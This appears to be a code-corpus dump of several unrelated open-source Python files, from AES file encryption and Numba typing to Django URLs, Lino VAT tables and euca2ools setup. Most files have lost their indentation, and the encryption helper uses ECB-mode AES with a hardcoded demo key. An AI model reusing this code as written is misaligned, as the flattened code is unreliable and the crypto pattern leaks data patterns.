n = realn
chunk = f.read(n)
plain = aes.decrypt(chunk)
return plain[:realn]
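# On-disk chunk format implied by the two functions above: a 2-byte
# big-endian header holding the plaintext length, followed by ciphertext
# padded with spaces to a 16-byte AES block boundary. Note that
# AES.new(key) with no mode argument defaults to ECB in PyCrypto, which
# leaks patterns across identical blocks; that is the library default
# here, not a recommendation.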
def transform_file(infname, outfname, key, chunk_func):
inf = open(infname, 'rb')
outf = open(outfname, 'wb')
aes = AES.new(key)
chunk = chunk_func(inf, aes)
while chunk:
outf.write(chunk)
chunk = chunk_func(inf, aes)
inf.close()
outf.close()
def encrypt_file(infname, outfname, key):
transform_file(infname, outfname, key, encrypt_chunk)
def decrypt_file(infname, outfname, key):
transform_file(infname, outfname, key, decrypt_chunk)
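if __name__ == '__main__':
    # Minimal round-trip demo (a sketch; the file names are illustrative).
    # PyCrypto requires the key to be 16, 24 or 32 bytes long.
    demo_key = b'0123456789abcdef'
    encrypt_file('plain.bin', 'cipher.bin', demo_key)
    decrypt_file('cipher.bin', 'roundtrip.bin', demo_key)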
| zhemao/bootlegger | bootlegger/cryptfile.py | Python | bsd-2-clause | 1,195 |
import os.path
import subprocess
import sys
import prob_util
CODEBASE_DIR = subprocess.check_output(['git', 'rev-parse', '--show-toplevel']).strip('\n')
MALE_NAME_FILE = os.path.join(CODEBASE_DIR, 'data', 'male-first.txt')
FEMALE_NAME_FILE = os.path.join(CODEBASE_DIR, 'data', 'female-first.txt')
LASTNAME_FILE = os.path.join(CODEBASE_DIR, 'data', 'lastnames.txt')
def load_name_data(fpath):
""" Loads name data as list of names paired with frequency """
with open(fpath, 'r') as fp:
data = [x.split(' ') for x in fp.read().split('\n') if len(x) > 0]
stat_data = [(x[0], float(x[1])) for x in data]
    total = sum(freq for _, freq in stat_data)
    stat_data = [(name, freq / total) for name, freq in stat_data]
assert abs(1.0 - sum([freq for _,freq in stat_data])) < 1e-6, "Frequencies should sum to 1.0"
return stat_data
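# Hedged sketch of the expected census-style input: one "NAME frequency"
# pair at the start of each line (any trailing columns in the real files
# are ignored by load_name_data):
#
#   JAMES 3.318
#   JOHN 3.271
#   ROBERT 3.143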
def load_all_names():
files = [MALE_NAME_FILE, FEMALE_NAME_FILE, LASTNAME_FILE]
    lists = []
    for fpath in files:
        lists.append(load_name_data(fpath))
male_freq_list = prob_util.freq_list_from_tuple_list(lists[0])
female_freq_list = prob_util.freq_list_from_tuple_list(lists[1])
last_freq_list = prob_util.freq_list_from_tuple_list(lists[2])
return male_freq_list, female_freq_list, last_freq_list
"""
if __name__ == "__main__":
infile = sys.argv[1]
outfile = sys.argv[2] if len(sys.argv) > 2 else sys.argv[1]
with open(infile, "r") as inf:
raw = inf.read()
raw = raw.split('\n')
freq_names = []
for line in raw:
if len(line) < 1:
continue
line = [l for l in line.split(' ') if len(l) > 0]
freq_names.append( (line[0], line[1]) )
with open(outfile, "w+") as outf:
for name, freq in freq_names:
outf.write(name + ' ' + freq + '\n')
"""
| iveygman/namegen | util/names.py | Python | bsd-2-clause | 1,858 |
# pylint: disable=W0401
from .test_triggers import *
from .test_views import *
from .test_factories import *
from .test_path_filter import *
from .test_topology import *
from .test_path_split import *
from .test_filters import *
from .test_graph import *
from .test_forms import *
from .test_fields import *
from .test_models import *
| camillemonchicourt/Geotrek | geotrek/core/tests/__init__.py | Python | bsd-2-clause | 336 |
import traceback
from collections import namedtuple, defaultdict
import itertools
import logging
import textwrap
from shutil import get_terminal_size
from .abstract import Callable, DTypeSpec, Dummy, Literal, Type, weakref
from .common import Opaque
from .misc import unliteral
from numba.core import errors, utils, types, config
from numba.core.typeconv import Conversion
_logger = logging.getLogger(__name__)
# terminal color markup
_termcolor = errors.termcolor()
_FAILURE = namedtuple('_FAILURE', 'template matched error literal')
_termwidth = get_terminal_size().columns
# pull out the lead line as unit tests often use this
_header_lead = "No implementation of function"
_header_template = (_header_lead + " {the_function} found for signature:\n \n "
">>> {fname}({signature})\n \nThere are {ncandidates} "
"candidate implementations:")
_reason_template = """
" - Of which {nmatches} did not match due to:\n
"""
def _wrapper(tmp, indent=0):
return textwrap.indent(tmp, ' ' * indent, lambda line: True)
_overload_template = ("- Of which {nduplicates} did not match due to:\n"
"{kind} {inof} function '{function}': File: {file}: "
"Line {line}.\n With argument(s): '({args})':")
_err_reasons = {'specific_error': "Rejected as the implementation raised a "
"specific error:\n{}"}
def _bt_as_lines(bt):
"""
Converts a backtrace into a list of lines, squashes it a bit on the way.
"""
return [y for y in itertools.chain(*[x.split('\n') for x in bt]) if y]
def argsnkwargs_to_str(args, kwargs):
buf = [str(a) for a in tuple(args)]
buf.extend(["{}={}".format(k, v) for k, v in kwargs.items()])
return ', '.join(buf)
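# Doctest-style sketch of the helper above (the types shown are only
# illustrative; any objects with a sensible str() would do):
#
#   >>> argsnkwargs_to_str((types.int64,), {'axis': types.int64})
#   'int64, axis=int64'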
class _ResolutionFailures(object):
"""Collect and format function resolution failures.
"""
def __init__(self, context, function_type, args, kwargs, depth=0):
self._context = context
self._function_type = function_type
self._args = args
self._kwargs = kwargs
self._failures = defaultdict(list)
self._depth = depth
self._max_depth = 5
self._scale = 2
def __len__(self):
return len(self._failures)
def add_error(self, calltemplate, matched, error, literal):
"""
Args
----
calltemplate : CallTemplate
error : Exception or str
Error message
"""
isexc = isinstance(error, Exception)
errclazz = '%s: ' % type(error).__name__ if isexc else ''
key = "{}{}".format(errclazz, str(error))
self._failures[key].append(_FAILURE(calltemplate, matched, error,
literal))
def format(self):
"""Return a formatted error message from all the gathered errors.
"""
indent = ' ' * self._scale
argstr = argsnkwargs_to_str(self._args, self._kwargs)
ncandidates = sum([len(x) for x in self._failures.values()])
# sort out a display name for the function
tykey = self._function_type.typing_key
# most things have __name__
fname = getattr(tykey, '__name__', None)
is_external_fn_ptr = isinstance(self._function_type,
ExternalFunctionPointer)
if fname is None:
if is_external_fn_ptr:
fname = "ExternalFunctionPointer"
else:
fname = "<unknown function>"
msgbuf = [_header_template.format(the_function=self._function_type,
fname=fname,
signature=argstr,
ncandidates=ncandidates)]
nolitargs = tuple([unliteral(a) for a in self._args])
nolitkwargs = {k: unliteral(v) for k, v in self._kwargs.items()}
nolitargstr = argsnkwargs_to_str(nolitargs, nolitkwargs)
# depth could potentially get massive, so limit it.
ldepth = min(max(self._depth, 0), self._max_depth)
def template_info(tp):
src_info = tp.get_template_info()
unknown = "unknown"
source_name = src_info.get('name', unknown)
source_file = src_info.get('filename', unknown)
source_lines = src_info.get('lines', unknown)
source_kind = src_info.get('kind', 'Unknown template')
return source_name, source_file, source_lines, source_kind
for i, (k, err_list) in enumerate(self._failures.items()):
err = err_list[0]
nduplicates = len(err_list)
template, error = err.template, err.error
ifo = template_info(template)
source_name, source_file, source_lines, source_kind = ifo
largstr = argstr if err.literal else nolitargstr
if err.error == "No match.":
err_dict = defaultdict(set)
for errs in err_list:
err_dict[errs.template].add(errs.literal)
# if there's just one template, and it's erroring on
# literal/nonliteral be specific
if len(err_dict) == 1:
template = [_ for _ in err_dict.keys()][0]
source_name, source_file, source_lines, source_kind = \
template_info(template)
source_lines = source_lines[0]
else:
source_file = "<numerous>"
source_lines = "N/A"
msgbuf.append(_termcolor.errmsg(
_wrapper(_overload_template.format(nduplicates=nduplicates,
kind=source_kind.title(),
function=fname,
inof='of',
file=source_file,
line=source_lines,
args=largstr),
ldepth + 1)))
msgbuf.append(_termcolor.highlight(_wrapper(err.error,
ldepth + 2)))
else:
# There was at least one match in this failure class, but it
# failed for a specific reason try and report this.
msgbuf.append(_termcolor.errmsg(
_wrapper(_overload_template.format(nduplicates=nduplicates,
kind=source_kind.title(),
function=source_name,
inof='in',
file=source_file,
line=source_lines[0],
args=largstr),
ldepth + 1)))
if isinstance(error, BaseException):
reason = indent + self.format_error(error)
errstr = _err_reasons['specific_error'].format(reason)
else:
errstr = error
# if you are a developer, show the back traces
if config.DEVELOPER_MODE:
if isinstance(error, BaseException):
# if the error is an actual exception instance, trace it
bt = traceback.format_exception(type(error), error,
error.__traceback__)
else:
bt = [""]
bt_as_lines = _bt_as_lines(bt)
nd2indent = '\n{}'.format(2 * indent)
errstr += _termcolor.reset(nd2indent +
nd2indent.join(bt_as_lines))
msgbuf.append(_termcolor.highlight(_wrapper(errstr,
ldepth + 2)))
loc = self.get_loc(template, error)
if loc:
msgbuf.append('{}raised from {}'.format(indent, loc))
# the commented bit rewraps each block, may not be helpful?!
return _wrapper('\n'.join(msgbuf) + '\n') # , self._scale * ldepth)
def format_error(self, error):
"""Format error message or exception
"""
if isinstance(error, Exception):
return '{}: {}'.format(type(error).__name__, error)
else:
return '{}'.format(error)
def get_loc(self, classtemplate, error):
"""Get source location information from the error message.
"""
if isinstance(error, Exception) and hasattr(error, '__traceback__'):
# traceback is unavailable in py2
frame = traceback.extract_tb(error.__traceback__)[-1]
return "{}:{}".format(frame[0], frame[1])
def raise_error(self):
for faillist in self._failures.values():
for fail in faillist:
if isinstance(fail.error, errors.ForceLiteralArg):
raise fail.error
raise errors.TypingError(self.format())
def _unlit_non_poison(ty):
"""Apply unliteral(ty) and raise a TypingError if type is Poison.
"""
out = unliteral(ty)
if isinstance(out, types.Poison):
m = f"Poison type used in arguments; got {out}"
raise errors.TypingError(m)
return out
class BaseFunction(Callable):
"""
Base type class for some function types.
"""
def __init__(self, template):
if isinstance(template, (list, tuple)):
self.templates = tuple(template)
keys = set(temp.key for temp in self.templates)
if len(keys) != 1:
raise ValueError("incompatible templates: keys = %s"
% (keys,))
self.typing_key, = keys
else:
self.templates = (template,)
self.typing_key = template.key
self._impl_keys = {}
name = "%s(%s)" % (self.__class__.__name__, self.typing_key)
self._depth = 0
super(BaseFunction, self).__init__(name)
@property
def key(self):
return self.typing_key, self.templates
def augment(self, other):
"""
Augment this function type with the other function types' templates,
so as to support more input types.
"""
if type(other) is type(self) and other.typing_key == self.typing_key:
return type(self)(self.templates + other.templates)
def get_impl_key(self, sig):
"""
Get the implementation key (used by the target context) for the
given signature.
"""
return self._impl_keys[sig.args]
def get_call_type(self, context, args, kws):
from numba.core.target_extension import (target_registry,
get_local_target)
prefer_lit = [True, False] # old behavior preferring literal
prefer_not = [False, True] # new behavior preferring non-literal
failures = _ResolutionFailures(context, self, args, kws,
depth=self._depth)
        # get the current target
target_hw = get_local_target(context)
# fish out templates that are specific to the target if a target is
# specified
DEFAULT_TARGET = 'generic'
usable = []
for ix, temp_cls in enumerate(self.templates):
# ? Need to do something about this next line
hw = temp_cls.metadata.get('target', DEFAULT_TARGET)
if hw is not None:
hw_clazz = target_registry[hw]
if target_hw.inherits_from(hw_clazz):
usable.append((temp_cls, hw_clazz, ix))
# sort templates based on target specificity
def key(x):
return target_hw.__mro__.index(x[1])
order = [x[0] for x in sorted(usable, key=key)]
if not order:
msg = (f"Function resolution cannot find any matches for function"
f" '{self.key[0]}' for the current target: '{target_hw}'.")
raise errors.UnsupportedError(msg)
self._depth += 1
for temp_cls in order:
temp = temp_cls(context)
# The template can override the default and prefer literal args
choice = prefer_lit if temp.prefer_literal else prefer_not
for uselit in choice:
try:
if uselit:
sig = temp.apply(args, kws)
else:
nolitargs = tuple([_unlit_non_poison(a) for a in args])
nolitkws = {k: _unlit_non_poison(v)
for k, v in kws.items()}
sig = temp.apply(nolitargs, nolitkws)
except Exception as e:
sig = None
failures.add_error(temp, False, e, uselit)
else:
if sig is not None:
self._impl_keys[sig.args] = temp.get_impl_key(sig)
self._depth -= 1
return sig
else:
registered_sigs = getattr(temp, 'cases', None)
if registered_sigs is not None:
msg = "No match for registered cases:\n%s"
msg = msg % '\n'.join(" * {}".format(x) for x in
registered_sigs)
else:
msg = 'No match.'
failures.add_error(temp, True, msg, uselit)
failures.raise_error()
def get_call_signatures(self):
sigs = []
is_param = False
for temp in self.templates:
sigs += getattr(temp, 'cases', [])
is_param = is_param or hasattr(temp, 'generic')
return sigs, is_param
class Function(BaseFunction, Opaque):
"""
Type class for builtin functions implemented by Numba.
"""
class BoundFunction(Callable, Opaque):
"""
A function with an implicit first argument (denoted as *this* below).
"""
def __init__(self, template, this):
# Create a derived template with an attribute *this*
newcls = type(template.__name__ + '.' + str(this), (template,),
dict(this=this))
self.template = newcls
self.typing_key = self.template.key
self.this = this
name = "%s(%s for %s)" % (self.__class__.__name__,
self.typing_key, self.this)
super(BoundFunction, self).__init__(name)
def unify(self, typingctx, other):
if (isinstance(other, BoundFunction) and
self.typing_key == other.typing_key):
this = typingctx.unify_pairs(self.this, other.this)
if this is not None:
# XXX is it right that both template instances are distinct?
return self.copy(this=this)
def copy(self, this):
return type(self)(self.template, this)
@property
def key(self):
return self.typing_key, self.this
def get_impl_key(self, sig):
"""
Get the implementation key (used by the target context) for the
given signature.
"""
return self.typing_key
def get_call_type(self, context, args, kws):
template = self.template(context)
literal_e = None
nonliteral_e = None
out = None
choice = [True, False] if template.prefer_literal else [False, True]
for uselit in choice:
if uselit:
# Try with Literal
try:
out = template.apply(args, kws)
except Exception as exc:
if isinstance(exc, errors.ForceLiteralArg):
raise exc
literal_e = exc
out = None
else:
break
else:
# if the unliteral_args and unliteral_kws are the same as the
# literal ones, set up to not bother retrying
unliteral_args = tuple([_unlit_non_poison(a) for a in args])
unliteral_kws = {k: _unlit_non_poison(v)
for k, v in kws.items()}
skip = unliteral_args == args and kws == unliteral_kws
# If the above template application failed and the non-literal
# args are different to the literal ones, try again with
# literals rewritten as non-literals
if not skip and out is None:
try:
out = template.apply(unliteral_args, unliteral_kws)
except Exception as exc:
if isinstance(exc, errors.ForceLiteralArg):
if template.prefer_literal:
# For template that prefers literal types,
# reaching here means that the literal types
# have failed typing as well.
raise exc
nonliteral_e = exc
else:
break
if out is None and (nonliteral_e is not None or literal_e is not None):
header = "- Resolution failure for {} arguments:\n{}\n"
tmplt = _termcolor.highlight(header)
if config.DEVELOPER_MODE:
indent = ' ' * 4
def add_bt(error):
if isinstance(error, BaseException):
# if the error is an actual exception instance, trace it
bt = traceback.format_exception(type(error), error,
error.__traceback__)
else:
bt = [""]
nd2indent = '\n{}'.format(2 * indent)
errstr = _termcolor.reset(nd2indent +
nd2indent.join(_bt_as_lines(bt)))
return _termcolor.reset(errstr)
else:
add_bt = lambda X: ''
def nested_msg(literalness, e):
estr = str(e)
estr = estr if estr else (str(repr(e)) + add_bt(e))
new_e = errors.TypingError(textwrap.dedent(estr))
return tmplt.format(literalness, str(new_e))
raise errors.TypingError(nested_msg('literal', literal_e) +
nested_msg('non-literal', nonliteral_e))
return out
def get_call_signatures(self):
sigs = getattr(self.template, 'cases', [])
is_param = hasattr(self.template, 'generic')
return sigs, is_param
class MakeFunctionLiteral(Literal, Opaque):
pass
class _PickleableWeakRef(weakref.ref):
"""
Allow a weakref to be pickled.
Note that if the object referred to is not kept alive elsewhere in the
pickle, the weakref will immediately expire after being constructed.
"""
def __getnewargs__(self):
obj = self()
if obj is None:
raise ReferenceError("underlying object has vanished")
return (obj,)
class WeakType(Type):
"""
Base class for types parametered by a mortal object, to which only
a weak reference is kept.
"""
def _store_object(self, obj):
self._wr = _PickleableWeakRef(obj)
def _get_object(self):
obj = self._wr()
if obj is None:
raise ReferenceError("underlying object has vanished")
return obj
@property
def key(self):
return self._wr
def __eq__(self, other):
if type(self) is type(other):
obj = self._wr()
return obj is not None and obj is other._wr()
return NotImplemented
def __hash__(self):
return Type.__hash__(self)
class Dispatcher(WeakType, Callable, Dummy):
"""
Type class for @jit-compiled functions.
"""
def __init__(self, dispatcher):
self._store_object(dispatcher)
super(Dispatcher, self).__init__("type(%s)" % dispatcher)
def dump(self, tab=''):
print((f'{tab}DUMP {type(self).__name__}[code={self._code}, '
f'name={self.name}]'))
self.dispatcher.dump(tab=tab + ' ')
print(f'{tab}END DUMP')
def get_call_type(self, context, args, kws):
"""
Resolve a call to this dispatcher using the given argument types.
        A signature is returned, and it is ensured that a compiled
        specialization is available for it.
"""
template, pysig, args, kws = \
self.dispatcher.get_call_template(args, kws)
sig = template(context).apply(args, kws)
if sig:
sig = sig.replace(pysig=pysig)
return sig
def get_call_signatures(self):
sigs = self.dispatcher.nopython_signatures
return sigs, True
@property
def dispatcher(self):
"""
A strong reference to the underlying numba.dispatcher.Dispatcher
instance.
"""
return self._get_object()
def get_overload(self, sig):
"""
Get the compiled overload for the given signature.
"""
return self.dispatcher.get_overload(sig.args)
def get_impl_key(self, sig):
"""
Get the implementation key for the given signature.
"""
return self.get_overload(sig)
def unify(self, context, other):
return utils.unified_function_type((self, other), require_precise=False)
def can_convert_to(self, typingctx, other):
if isinstance(other, types.FunctionType):
if self.dispatcher.get_compile_result(other.signature):
return Conversion.safe
class ObjModeDispatcher(Dispatcher):
"""Dispatcher subclass that enters objectmode function.
"""
pass
class ExternalFunctionPointer(BaseFunction):
"""
A pointer to a native function (e.g. exported via ctypes or cffi).
*get_pointer* is a Python function taking an object
and returning the raw pointer value as an int.
"""
def __init__(self, sig, get_pointer, cconv=None):
from numba.core.typing.templates import (AbstractTemplate,
make_concrete_template,
signature)
from numba.core.types import ffi_forced_object
if sig.return_type == ffi_forced_object:
raise TypeError("Cannot return a pyobject from a external function")
self.sig = sig
self.requires_gil = any(a == ffi_forced_object for a in self.sig.args)
self.get_pointer = get_pointer
self.cconv = cconv
if self.requires_gil:
class GilRequiringDefn(AbstractTemplate):
key = self.sig
def generic(self, args, kws):
if kws:
raise TypeError("does not support keyword arguments")
# Make ffi_forced_object a bottom type to allow any type to
# be casted to it. This is the only place that support
# ffi_forced_object.
coerced = [actual if formal == ffi_forced_object else formal
for actual, formal
in zip(args, self.key.args)]
return signature(self.key.return_type, *coerced)
template = GilRequiringDefn
else:
template = make_concrete_template("CFuncPtr", sig, [sig])
super(ExternalFunctionPointer, self).__init__(template)
@property
def key(self):
return self.sig, self.cconv, self.get_pointer
class ExternalFunction(Function):
"""
A named native function (resolvable by LLVM) accepting an explicit
signature. For internal use only.
"""
def __init__(self, symbol, sig):
from numba.core import typing
self.symbol = symbol
self.sig = sig
template = typing.make_concrete_template(symbol, symbol, [sig])
super(ExternalFunction, self).__init__(template)
@property
def key(self):
return self.symbol, self.sig
class NamedTupleClass(Callable, Opaque):
"""
Type class for namedtuple classes.
"""
def __init__(self, instance_class):
self.instance_class = instance_class
name = "class(%s)" % (instance_class)
super(NamedTupleClass, self).__init__(name)
def get_call_type(self, context, args, kws):
# Overridden by the __call__ constructor resolution in
# typing.collections
return None
def get_call_signatures(self):
return (), True
@property
def key(self):
return self.instance_class
class NumberClass(Callable, DTypeSpec, Opaque):
"""
Type class for number classes (e.g. "np.float64").
"""
def __init__(self, instance_type):
self.instance_type = instance_type
name = "class(%s)" % (instance_type,)
super(NumberClass, self).__init__(name)
def get_call_type(self, context, args, kws):
# Overridden by the __call__ constructor resolution in typing.builtins
return None
def get_call_signatures(self):
return (), True
@property
def key(self):
return self.instance_type
@property
def dtype(self):
return self.instance_type
class RecursiveCall(Opaque):
"""
Recursive call to a Dispatcher.
"""
_overloads = None
def __init__(self, dispatcher_type):
assert isinstance(dispatcher_type, Dispatcher)
self.dispatcher_type = dispatcher_type
name = "recursive(%s)" % (dispatcher_type,)
super(RecursiveCall, self).__init__(name)
# Initializing for the first time
if self._overloads is None:
self._overloads = {}
@property
def overloads(self):
return self._overloads
@property
def key(self):
return self.dispatcher_type
| stonebig/numba | numba/core/types/functions.py | Python | bsd-2-clause | 26,542 |
from django.conf.urls import patterns, url
from packages.simple.views import PackageIndex, PackageDetail
handler404 = "packages.simple.views.not_found"
urlpatterns = patterns("",
url(r"^$", PackageIndex.as_view(), name="simple_package_index"),
url(r"^(?P<slug>[^/]+)/(?:(?P<version>[^/]+)/)?$", PackageDetail.as_view(), name="simple_package_detail"),
)
| crate-archive/crate-site | crateweb/apps/packages/simple/urls.py | Python | bsd-2-clause | 364 |
# Copyright 2012-2017 Luc Saffre
# License: BSD (see file COPYING for details)
from __future__ import unicode_literals
from __future__ import print_function
from lino.api import dd, rt, _
# from etgen.html import E
from .mixins import VatDocument
from lino_xl.lib.ledger.ui import PartnerVouchers, ByJournal, PrintableByJournal
from lino_xl.lib.ledger.choicelists import TradeTypes
from lino_xl.lib.ledger.choicelists import VoucherTypes
from lino_xl.lib.ledger.roles import LedgerUser, LedgerStaff
from lino_xl.lib.ledger.mixins import ItemsByVoucher
from lino_xl.lib.ledger.mixins import VouchersByPartnerBase
from .choicelists import VatRegimes
# class VatRules(dd.Table):
# model = 'vat.VatRule'
# required_roles = dd.login_required(LedgerStaff)
# column_names = "seqno vat_area trade_type vat_class vat_regime \
# #start_date #end_date rate can_edit \
# vat_account vat_returnable vat_returnable_account *"
# hide_sums = True
# auto_fit_column_widths = True
# order_by = ['seqno']
class InvoiceDetail(dd.DetailLayout):
main = "general ledger"
totals = """
total_base
total_vat
total_incl
workflow_buttons
"""
general = dd.Panel("""
id entry_date partner user
due_date your_ref vat_regime #item_vat
ItemsByInvoice:60 totals:20
""", label=_("General"))
ledger = dd.Panel("""
journal accounting_period number narration
ledger.MovementsByVoucher
""", label=_("Ledger"))
class Invoices(PartnerVouchers):
required_roles = dd.login_required(LedgerUser)
model = 'vat.VatAccountInvoice'
order_by = ["-id"]
column_names = "entry_date id number_with_year partner total_incl user *"
detail_layout = InvoiceDetail()
insert_layout = """
journal partner
entry_date total_incl
"""
# start_at_bottom = True
class InvoicesByJournal(Invoices, ByJournal):
params_layout = "partner state start_period end_period user"
column_names = "number_with_year voucher_date due_date " \
"partner " \
"total_incl " \
"total_base total_vat user workflow_buttons *"
#~ "ledger_remark:10 " \
insert_layout = """
partner
entry_date total_incl
"""
class PrintableInvoicesByJournal(PrintableByJournal, Invoices):
label = _("Purchase journal")
VoucherTypes.add_item_lazy(InvoicesByJournal)
class ItemsByInvoice(ItemsByVoucher):
model = 'vat.InvoiceItem'
display_mode = 'grid'
column_names = "account title vat_class total_base total_vat total_incl"
class VouchersByPartner(VouchersByPartnerBase):
label = _("VAT vouchers")
column_names = "entry_date voucher total_incl total_base total_vat"
_voucher_base = VatDocument
@dd.virtualfield('vat.VatAccountInvoice.total_incl')
def total_incl(self, row, ar):
return row.total_incl
@dd.virtualfield('vat.VatAccountInvoice.total_base')
def total_base(self, row, ar):
return row.total_base
@dd.virtualfield('vat.VatAccountInvoice.total_vat')
def total_vat(self, row, ar):
return row.total_vat
class IntracomInvoices(PartnerVouchers):
_trade_type = None
editable = False
model = VatDocument
column_names = 'detail_pointer partner partner__vat_id vat_regime total_base total_vat total_incl'
# order_by = ['entry_date', 'partner']
# order_by = ['entry_date', 'id']
# order_by = ['entry_date', 'number']
order_by = ['number']
hidden_elements = frozenset(
"""entry_date journal__trade_type journal number
journal__trade_type state user""".split())
@classmethod
def get_request_queryset(cls, ar, **kwargs):
fkw = dict()
if cls._trade_type is not None:
fkw.update(journal__trade_type=cls._trade_type)
regimes = set([r for r in VatRegimes.get_list_items()
if r.name.startswith('intracom')])
# (VatRegimes.intracom, VatRegimes.intracom_supp)
fkw.update(vat_regime__in=regimes)
qs = super(IntracomInvoices, cls).get_request_queryset(ar, **fkw)
# raise Exception("20170905 {}".format(qs.query))
return qs
dd.update_field(
IntracomInvoices, 'detail_pointer', verbose_name=_("Invoice"))
class IntracomSales(IntracomInvoices):
_trade_type = TradeTypes.sales
label = _("Intra-Community sales")
class IntracomPurchases(IntracomInvoices):
_trade_type = TradeTypes.purchases
label = _("Intra-Community purchases")
| khchine5/xl | lino_xl/lib/vat/desktop.py | Python | bsd-2-clause | 4,520 |
# Copyright 2009-2015 Eucalyptus Systems, Inc.
#
# Redistribution and use of this software in source and binary forms,
# with or without modification, are permitted provided that the following
# conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from distutils.command.build_py import build_py
from distutils.command.build_scripts import build_scripts
from distutils.command.install_scripts import install_scripts
from distutils.command.sdist import sdist
import glob
import os.path
import sys
from setuptools import find_packages, setup
from euca2ools import __version__
REQUIREMENTS = ['lxml',
'PyYAML',
'requestbuilder>=0.4',
'requests',
'six>=1.4']
if sys.version_info < (2, 7):
REQUIREMENTS.append('argparse')
# Cheap hack: install symlinks separately from regular files.
# cmd.copy_tree accepts a preserve_symlinks option, but when we call
# ``setup.py install'' more than once the method fails when it encounters
# symlinks that are already there.
class build_scripts_except_symlinks(build_scripts):
'''Like build_scripts, but ignoring symlinks'''
def copy_scripts(self):
orig_scripts = self.scripts
self.scripts = [script for script in self.scripts
if not os.path.islink(script)]
build_scripts.copy_scripts(self)
self.scripts = orig_scripts
class install_scripts_and_symlinks(install_scripts):
'''Like install_scripts, but also replicating nonexistent symlinks'''
def run(self):
install_scripts.run(self)
# Replicate symlinks if they don't exist
for script in self.distribution.scripts:
if os.path.islink(script):
target = os.readlink(script)
newlink = os.path.join(self.install_dir,
os.path.basename(script))
if not os.path.exists(newlink):
os.symlink(target, newlink)
class build_py_with_git_version(build_py):
'''Like build_py, but also hardcoding the version in __init__.__version__
so it's consistent even outside of the source tree'''
def build_module(self, module, module_file, package):
build_py.build_module(self, module, module_file, package)
if module == '__init__' and '.' not in package:
version_line = "__version__ = '{0}'\n".format(__version__)
old_init_name = self.get_module_outfile(self.build_lib, (package,),
module)
new_init_name = old_init_name + '.new'
with open(new_init_name, 'w') as new_init:
with open(old_init_name) as old_init:
for line in old_init:
if line.startswith('__version__ ='):
new_init.write(version_line)
else:
new_init.write(line)
new_init.flush()
os.rename(new_init_name, old_init_name)
class sdist_with_git_version(sdist):
'''Like sdist, but also hardcoding the version in __init__.__version__ so
it's consistent even outside of the source tree'''
def make_release_tree(self, base_dir, files):
sdist.make_release_tree(self, base_dir, files)
version_line = "__version__ = '{0}'\n".format(__version__)
old_init_name = os.path.join(base_dir, 'euca2ools/__init__.py')
new_init_name = old_init_name + '.new'
with open(new_init_name, 'w') as new_init:
with open(old_init_name) as old_init:
for line in old_init:
if line.startswith('__version__ ='):
new_init.write(version_line)
else:
new_init.write(line)
new_init.flush()
os.rename(new_init_name, old_init_name)
setup(name="euca2ools",
version=__version__,
description="Eucalyptus Command Line Tools",
long_description="Eucalyptus Command Line Tools",
author="Eucalyptus Systems, Inc.",
author_email="[email protected]",
url="http://www.eucalyptus.com",
scripts=sum((glob.glob('bin/euare-*'),
glob.glob('bin/euca-*'),
glob.glob('bin/euform-*'),
glob.glob('bin/euimage-*'),
glob.glob('bin/eulb-*'),
glob.glob('bin/euscale-*'),
glob.glob('bin/euwatch-*')),
[]),
data_files=[('share/man/man1', glob.glob('man/*.1')),
('share/man/man5', glob.glob('man/*.5')),
('share/man/man7', glob.glob('man/*.7'))],
packages=find_packages(),
install_requires=REQUIREMENTS,
license='BSD (Simplified)',
platforms='Posix; MacOS X',
classifiers=['Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: Simplified BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Topic :: Internet'],
cmdclass={'build_py': build_py_with_git_version,
'build_scripts': build_scripts_except_symlinks,
'install_scripts': install_scripts_and_symlinks,
'sdist': sdist_with_git_version})
| nagyistoce/euca2ools | setup.py | Python | bsd-2-clause | 6,806 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Hutte documentation build configuration file, created by
# sphinx-quickstart on Mon Jul 27 23:08:58 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.todo',
'rubydomain'
]
primary_domain = 'rb'
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'Hutte'
copyright = '2015, Bastien Léonard'
author = 'Bastien Léonard'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
